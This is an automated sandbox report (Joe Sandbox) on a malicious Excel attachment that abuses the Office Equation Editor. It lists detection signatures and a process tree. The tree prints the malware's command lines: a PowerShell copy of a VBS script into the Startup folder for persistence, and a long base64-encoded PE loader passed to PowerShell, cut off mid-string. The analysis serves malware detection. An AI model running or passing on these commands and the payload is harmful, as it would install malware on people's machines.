Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
RFQ PO9845.xlsx

Overview

General Information

Sample Name:RFQ PO9845.xlsx
Analysis ID:891787
MD5:8525d7dfb6d2b57d88e917b1a31f2a4c
SHA1:7aa5e1f3cbf790a22112504cb724618685185102
SHA256:43e75fa222a5601992a5c49d5b1372db2d13d0963fa0f1a45885d2daacd53850
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Sigma detected: File Dropped By EQNEDT32EXE
Wscript starts Powershell (via cmd or directly)
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Very long command line found
Suspicious powershell command line found
Uses ping.exe to check the status of other devices and networks
Shellcode detected
Uses ping.exe to sleep
Office equation editor establishes network connection
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Internet Provider seen in connection with other malware
Stores large binary data to the registry
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
Contains long sleeps (>= 3 min)
Enables debug privileges
Potential document exploit detected (unknown TCP traffic)
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Contains functionality to download and execute PE files
Office Equation Editor has been started
Contains functionality to download and launch executables
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 2640 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 204 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • wscript.exe (PID: 3100 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\jyrthfdwrg.vbs" MD5: 979D74799EA6C8B8167869A68DF5204A)
      • cmd.exe (PID: 3156 cmdline: "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\jyrthfdwrg.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ Wk.vbs') MD5: AD7B9C14083B52BC532FBA5948342B98)
        • PING.EXE (PID: 3180 cmdline: ping 127.0.0.1 -n 10 MD5: 6242E3D67787CCBF4E06AD2982853144)
        • powershell.exe (PID: 3320 cmdline: powershell -command [System.IO.File]::Copy('C:\Windows\system32\jyrthfdwrg.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ Wk.vbs') MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
      • powershell.exe (PID: 3380 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string('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tAEQBG8AAAAAAAMARgPDAacEcAAAAAAAAwAGGM8JRgJyAAAAAAADAEYDvgGtBHQAAAAAAAMARgO0AcUEgAAAAAAAAwBGA8MB0gSDALQvAAAAABEA0wDkBI0AqzAAAAAAEwCpAEYBjwDEMAAACAATANMA7QSPAD0xAAAAAAYYzwkBAJEAAAABAI4FAAABAMMAAAACAK0IAAADAMMFACABAHUCAAABAPMLACACAHUCAAABANMAAAACAKkAAAABAD4BAAABAKsIAAABANMAAAABANMAAAABANMAAAACAKkAAAABABQCAAACAGsGAAADADkDAAABAK4MAAABABQCAAABANMAAAACAKkAAAABADIBAAACAP4MAAADAGsGAAAEADkDAAABAK4MAAABADIBAAACAP4MAAABANMAAAACAKkAAAABADIBAAACAP4MAAADAGsGAAAEADkDAAABAK4MAAABADIBAAACAP4MAAABANMAAAACAKkAAAABADIBAAACAP4MAAADAGsGAAAEADkDAAABAK4MAAABADIBAAACAP4MAAABANMAAAACAKkAAAABADIBAAACAP4MAAADAGsGAAAEADkDAAABAK4MAAABADIBAAACAP4MAAABANMAAAACAKkAAAABABQCAAACAB8MAAADAFYGAAAEAMUCAAAFAHIMAAAGAGsGAAAHADkDAAABAK4MAAABABQCAAACAB8MAAADAFYGAAAEAMUCAAAFAHIMAAABANMAAAACAKkAAAABAPwLAAACABMMAAADAPUIAAAEALEFAAAFAGYHAAAGAGsGAAAHADkDAAABAGYHAAACAK4MAAABAPwLAAACABMMAAADAPUIAAAEALEFAAAFAGYHAAABANMAAAACAKkAAAABAPwLAAACABMMAAADAPUIAAAEALEFAAAFACgBAAAGAGsGAAAHADkDAAABAPUIAAACACgBAAADAK4MAAABAPwLAAACABMMAAADAPUIAAAEALEFAAAFACgBAAABANMAAAACAKkAAAABAPwLAAACABMMAAADAGsGAAAEADkDAAABAK4MAAABAPwLAAACABMMAAABANMAAAACAKkAAAABAFkCAAACAH8CAAADAFULAAAEAEQLAAAFAAULAAAGAHALAAAHANgMAAAIAJ4NAAAJAG8IAAAKAOcHAAALAGsGAAAMADkDAAABAG8I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c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljAE1pY3Jvc29mdC5WaXN1YWxCYXNpYwBQcm9jZXNzSWQAR2V0UHJvY2Vzc0J5SWQAYnl0ZXNSZWFkAHRocmVhZABMb2FkAHBheWxvYWQAU3luY2hyb25pemVkAE5ld0d1aWQAUmVwbGFjZQBDcmVhdGVJbnN0YW5jZQBnZXRfR2V0SW5zdGFuY2UAQW5kZQBHZXRIYXNoQ29kZQBDcnlwdG9TdHJlYW1Nb2RlAENvbXByZXNzaW9uTW9kZQBFbmRJbnZva2UAQmVnaW5JbnZva2UARW51bWVyYWJsZQBUaHJlYWRIYW5kbGUAUnVudGltZVR5cGVIYW5kbGUAR2V0VHlwZUZyb21IYW5kbGUAUHJvY2Vzc0hhbmRsZQBoYW5kbGUARmlsZQBzZXRfV2luZG93U3R5bGUAUHJvY2Vzc1dpbmRvd1N0eWxlAGdldF9OYW1lAHNldF9GaWxlTmFtZQBhcHBsaWNhdGlvbk5hbWUAR2V0RGlyZWN0b3J5TmFtZQBIb21lAGNvbW1hbmRMaW5lAENvbWJpbmUAQ2hhbmdlVHlwZQBWYWx1ZVR5cGUAU2VjdXJpdHlQcm90b2NvbFR5cGUAR2V0VHlwZQB0eXBlAFN5c3RlbS5Db3JlAGdldF9DdWx0dXJlAHNldF9DdWx0dXJlAEFwcGxpY2F0aW9uQmFzZQBBcHBsaWNhdGlvblNldHRpbmdzQmFzZQBDbG9zZQBTdHJSZXZlcnNlAE11bHRpY2FzdERlbGVnYXRlAERlbGVnYXRlQXN5bmNTdGF0ZQBFZGl0b3JCcm93c2FibGVTdGF0ZQBHdWlkQXR0cmlidXRlAERlYnVnZ2VyTm9uVXNlckNvZGVBdHRyaWJ1dGUARGVidWdnYWJsZUF0dHJpYnV0ZQBFZGl0b3JCcm93c2FibGVBdHRyaWJ1dGUAQ29tVmlzaWJsZUF0dHJpYnV0ZQBBc3NlbWJseVRpdGxlQXR0cmlidXRlAFN0YW5kYXJkTW9kdWxlQXR0cmlidXRlAEhpZGVNb2R1bGVOYW1lQXR0cmlidXRlAEFzc2VtYmx5VHJhZGVtYXJrQXR0cmlidXRlAFRhcmdldEZyYW1ld29ya0F0dHJpYnV0ZQBEZWJ1Z2dlckhpZGRlbkF0dH